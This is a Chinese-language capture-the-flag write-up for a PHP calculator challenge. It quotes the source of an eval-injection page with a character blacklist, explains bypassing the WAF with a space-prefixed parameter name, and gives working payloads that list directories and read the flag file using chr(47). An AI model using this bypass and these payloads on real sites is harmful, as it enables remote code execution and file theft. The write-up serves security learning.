打开环境,发现一个简单的计算器,查看源码
提示上了waf,然后还有一个calc.php,访问页面
<?php
error_reporting(0);
if(!isset($_GET['num'])){
show_source(__FILE__);
}else{
$str = $_GET['num'];
$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
foreach ($blacklist as $blackitem) {
if (preg_match('/' . $blackitem . '/m', $str)) {
die("what are you want to do?");
}
}
eval('echo '.$str.';');
}
?>
出现一段代码,接下来进行代码审计。
对num传参,过滤了一些字符,最后一个eval函数,这里很容易就想到代码执行漏洞。
当你任意传一个字母进去时候,会发现waf拦截,这里可以利用PHP的字符串解析特性绕过waf,简单来讲当你传?%20num=aaa;时php会默认删除空格等同于?num=aaa; ,但是waf会认为你没有传参,参数num被%20截断,这样就可以绕过waf检测。
绕过后传入phpinfo()发现成功执行,一开始考虑上传一句话,然后发现php代码的过滤就是专门用来过滤一句话的
看一下哪些函数被过滤
发现可以用
? num=var_dump(scandir(/))来查看上层目录
但/被过滤,可以用chr(47)绕过(感觉也可以通过这种方式上一句话,但试了一下没连上)
```
payload:calc.php?%20num=var_dump(file_get_contents(chr(47).f1agg))
![在这里插入图片描述](https://img-blog.csdnimg.cn/20200621101808476.png)